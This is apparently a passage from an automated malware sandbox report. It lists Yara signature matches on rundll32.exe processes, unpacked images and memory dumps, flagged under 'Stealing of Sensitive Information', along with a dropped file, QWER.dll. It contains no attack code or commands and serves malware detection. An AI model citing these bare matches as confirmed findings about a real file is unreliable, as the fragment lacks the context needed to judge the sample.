Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2810000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2380000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2320000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.5f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2670000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.25f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2410000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.24d0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2280000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.820000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31d0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fd0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.910000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2250000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2350000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.7a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ae0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.a60000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f30000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2960000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.910000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e50000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.10000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED